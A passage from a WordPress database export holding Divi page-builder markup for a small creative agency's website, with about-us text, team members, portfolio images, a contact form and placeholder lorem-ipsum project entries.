border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||60px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" hover_enabled=\"0\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-08 18:48:58','2020-08-08 18:48:58','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/392-revision-v1/',0,'revision','',0),(663,1,'2020-08-08 18:51:22','2020-08-08 18:51:22','Professional Catalogue Design - Brochure Design services by WhatTheHell?\n','800x800 b1 (1)','Catalogue Design - Brochure Design\n','inherit','open','closed','','800x800-b1-1','','','2021-03-18 06:31:13','2021-03-18 06:31:13','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg',0,'attachment','image/jpeg',0),(664,1,'2020-08-08 18:52:56','2020-08-08 18:52:56','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"ABC - Corporate Branding\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" 